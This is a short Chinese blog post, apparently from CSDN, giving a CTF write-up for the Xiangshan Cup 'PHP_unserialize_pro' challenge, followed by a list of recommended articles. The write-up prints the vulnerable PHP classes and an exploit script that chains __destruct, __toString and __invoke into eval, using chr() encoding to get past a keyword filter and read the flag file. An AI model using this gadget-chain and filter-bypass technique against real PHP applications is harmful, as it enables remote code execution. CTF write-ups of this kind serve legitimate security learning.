香山杯反序列化题解

最新推荐文章于 2025-08-13 21:06:14 发布
最新推荐文章于 2025-08-13 21:06:14 发布
阅读量147 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 各类比赛wp 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qing_chuan_/article/details/134112248

香山杯反序列化题解

太菜了还是web就出了一个,差点拿到血了呜呜呜还是没拿到

PHP_unserialize_pro

<?php
class Welcome
{
    public $name='A_G00d_H4ck3r';
    public $arg = 'welcome';

//    public function __construct()
//    {
//        $this->name = 'Wh0 4m I?';
//    }

​    public function __destruct()
​    {
​        if ($this->name == 'A_G00d_H4ck3r') {
​            echo "1".$this->arg='1';
​        }
​    }
}

class G00d{
    public $shell;
    public $cmd;
    public function __invoke(){
        $shell = $this->shell;
        $cmd = $this->cmd;
        if(preg_match('/f|l|a|g|\*|\?/i', $cmd)){
            die("U R A BAD GUY");
        }
        eval($shell($cmd));
    }
}

class H4ck3r
{
    public $func;

​    public function __toString()
​    {
​        $function = $this->func;
​        return $function();
​    }
}
$a=new Welcome();
$a->name=new H4ck3r();
$a->name->func=new G00d();
$a->name->func->shell='strtolower';
$a->name->func->cmd='show_source(chr(47).chr(102).chr(49).chr(97).chr(103));';
echo serialize($a);
[羊城 2020]easyser - 反序列化+SSRF+伪协议(绕过死亡die)
oZuoShen123的博客
10-08 1198
F12看提示: 小胖说用个不安全的协议从我家才能进ser.php呢! ! 意思就是http协议就能进ser.php,回顾一下http协议咋用的?……
2023香山php反序列化题解
m0_74925562的博客
10-23 132
而命令执行出有对flag的正则过滤我们可以采用cd /;要执行上述代码就要进入_tosring(),而这个魔术方法的执行条件其中一个是当输出字符串时,这样而Welcome类里就有echo输出函数,这样我们就可以将三个类连起来。要命令执行就要进入G00D内并利用魔术方法__invoke(),利用条件是当函数被当成变量执行时就自动执行__invoke(),整个代码里只有H4CK3R类里。
【Web】2023香山决赛 security system 题解
uuzeray的博客
05-11 1692
add的值,即HashMap的key就是HashSet的iterator所取的内容,而PRESENT作用是占位。①题目hint:想办法修改属性值后进入java的原生反序列化,然后利用jackson链写入内存马。字段时,需要确保对应的Java类路径在类加载器的搜索路径上,并且Jackson的。反序列化入口有两处,第一处是jackson反序列化,第二处是无过滤的原生反序列化。但首先要在第一个反序列化入口打入属性覆盖,从而为进入第二个反序列化入口创造条件。对象,并将JSON中的其他属性值映射到该对象的属性上。
2023i春秋香山网络安全大赛Write up
m0_73734159的博客
10-16 1260
常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。序列化就是把类里面的对象转化成字符串形式(包括对象名、对象属性、对象字符、对象值等等)
信息学奥赛一本通(C++版)第二部分 基础算法 第二章 数据排序
diaearth
11-17 3348
第二章 数据排序
BUAA 数据结构总结——第7节(图)
Schrodinger007的博客
06-12 4661
第7节(图)第七次作业7.1 图遍历(图-基本题)思路「代码」 第七次作业 图的大题不考,因此仅完成第一题。 7.1 图遍历(图-基本题) 【问题描述】 给定一个无向图和一个图顶点,编程输出该图删除给定顶点前后按深度优先遍历及广度优先遍历方式遍历的图顶点序列。 给定的无向图和图顶点满足以下要求: 1、无向图的顶点个数n大于等于3,小于等于100,输入时顶点编号用整数0~n-1表示; 2、无向图在删除给定顶点前后都是连通的; 3、无论何种遍历,都是从编号为0的顶点开始遍历,访问相邻顶点时按照编号从小到大的顺序
Java面试-leetcode题解之第449题序列化和反序列化二叉搜索树.zip
07-24
java Java面试_leetcode题解之第449题序列化和反序列化二叉搜索树
ctf+php反序列化,CTF中的PHP反序列化漏洞简单分析
weixin_39965881的博客
04-02 1944
本帖最后由 icq_8bf67fe65 于 2018-9-2 21:20 编辑本文原创作者:Versi0n,本文属i春秋原创奖励计划,未经许可禁止转载!一、前言在ctf比赛中,经常会遇到php反序列化漏洞的题,今天就来简单分析下该漏洞的正确食用姿势~二、正文1.基础知识PHP序列化:php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串中,使用serialize()函数。PHP反序列...
反序列化渗透与防御之PHP
cxm4545的博客
04-18 1334
序列化是将对象的状态信息转化为可以存储或传输的形式的过程。简单讲,就是将数据转化成一种可逆的数据结构。序列化的作用就是便于传输对象和用作缓存。在PHP中,使用serialize()函数进行序列化。
java-leetcode面试题解Stack之第331题验证二叉树的前序序列化-题解.zip
05-05
题解着重关注的是LeetCode中的第331题,题目名为“验证二叉树的前序序列化”。这是一道与数据结构和算法相关的题目,主要涉及到了二叉树和栈的应用。 前序遍历是一种遍历二叉树的方法,其顺序为:根节点 -> 左...
FreeRTOS学习:优化系统
weixin_45198947的博客
08-10 486
摘要:针对嵌入式系统中栈空间优化和任务调度问题,文章提出通过填充0xa5a5a5a5检测栈使用量,结合vTaskList和vTaskGetRunTimeStats函数分析任务状态。重点指出定时器优先级不足导致OLED显示异常的问题,建议提升中断优先级。同时提出空闲任务优化方案,通过启用GENERATE_RUN_TIME_STATS统计功能,解决MPU6050空闲时CPU占用率过高(4%降至1%)的问题。文章详细说明了FreeRTOS配置宏定义和基准函数设置方法,为实时系统性能优化提供实用方案。
C++ 学习与 CLion 使用:(二)using namespace std 语句详解,以及 std 空间的标识符罗列
qq_51409113的博客
08-12 500
详细解释了 using namespace std 语句,并且尽可能地罗列了所有的 std 标识符
【Datawhale夏令营】多模态RAG学习
米吉米粒的专栏
08-12 708
本文介绍了一个基于多模态检索增强生成(Multimodal RAG)的智能问答系统构建方案。该系统旨在处理PDF文档中的图文信息,通过PyMuPDF解析文本并构建知识库,采用向量检索与LLM生成相结合的问答流程。Baseline方案包含PDF解析、文本分块、向量化存储和检索生成等模块。通过提示词优化、输出格式标准化和温度参数调整等改进措施,系统评分从0.00346提升至0.1611。未来可优化分块策略、升级解析方案并加强多模态融合,以进一步提升系统性能。
Vue3学习之创建vue3项目文件
2301_76989410的博客
08-09 495
Vue3是一个更高效、轻量级的渐进式JavaScript框架,专注于构建用户界面。本文介绍了Vue3项目创建流程:首先安装Node.js并验证环境;然后通过PyCharm创建项目文件夹,使用npm命令初始化Vue项目并选择配置(建议选择TypeScript);最后清理默认文件结构,开始自定义开发。文中还详细说明了如何删除默认组件代码,为个性化开发做好准备。
30天入门Python(基础篇)——第31天:标准库学习之re模块
weixin_42636075的博客
08-04 831
Python re模块是一个强大的正则表达式工具,可用于高效处理文本数据。摘要包括:1)基本功能:模式匹配、文本搜索、字符串替换、数据验证等;2)核心语法:元字符(.^$+?等)、字符类([ ])、预定义字符类(\d\w\s等)及量词(+?{});3)高级特性:分组捕获、贪婪/非贪婪匹配、性能优化。通过示例演示了正则表达式在邮箱验证、HTML解析等场景的应用,帮助开发者掌握文本处理利器。
若依前后端分离版学习笔记(九)——登录和操作日志
最新发布
weixin_55549435的博客
08-13 502
若依前后端分离版学习笔记(九)——登录和操作日志
自由学习记录(82)
red_redemption的博客
08-13 376
文章摘要: 本文详细介绍了Bitonic排序算法的实现,包括其递归分治结构、位元合并操作以及数组补齐处理。算法通过将输入数组补全为2的幂次长度,执行递归排序和合并操作,最后裁切结果。文章还探讨了GPU动画烘焙技术,将骨骼动画预计算为顶点序列缓冲区,实现实例化共享动画数据。同时介绍了力场影响器系统,通过ComputeBuffer传递位置/力参数来操控群体行为,并提供了性能优化建议,如内存对齐、缓冲区管理和渲染时序控制。在渲染管线部分,对比了VFX Graph与传统粒子系统的差异,阐述了URP中自定义渲染通道的
学习】DCMM认证从“跟风“到“生存法则“的进化
kedaruizhi的博客
08-11 301
数字化浪潮下,企业生存法则正在被重构,DCMM认证成为衡量数字化能力的关键标尺。作为国家级评估体系,DCMM从8大核心能力域、445项标准切入,为企业提供数字化"体检"服务,精准定位转型痛点。获证企业不仅能提升63%海外中标率、获得40%估值溢价,更能在风险防控(避免3.2亿合规损失)、运营效率(成本降35%)等方面实现突破。在数字化转型从"选择题"变为"必答题"的今天,DCMM认证正从资质证明升级为企业数字化战略的操作系统,成为商业竞争的新制高点
电子电路原理学习笔记---第5章特殊用途二极管---第2天
m0_74874269的博客
08-12 986
摘要:本文详细介绍了齐纳二极管和发光二极管的工作原理、参数特性及应用。在齐纳二极管部分,重点分析了最大功率、电流、容差和阻抗等关键参数,并讨论了故障诊断方法。发光二极管部分阐述了LED的电压电流特性、亮度控制、参数指标及典型应用电路,同时对比了高功率LED与传统光源的效率差异。文中还介绍了七段显示器等其他光电器件,通过具体电路实例和计算公式,全面展示了二极管器件在电子电路中的实用价值和技术要点。
祥云Web题解:深入探讨SSRF与Yii框架反序列化漏洞
"第二届祥云 Web 题解1 - 考察 SSRF、session 条件竞争以及 PHP 反序列化利用" 在此次祥云网络安全竞赛中,题目涉及了三个主要知识点:SSRF(Server-Side Request Forgery)、session 条件竞争以及 PHP 反序列...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Q1ng_chuan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值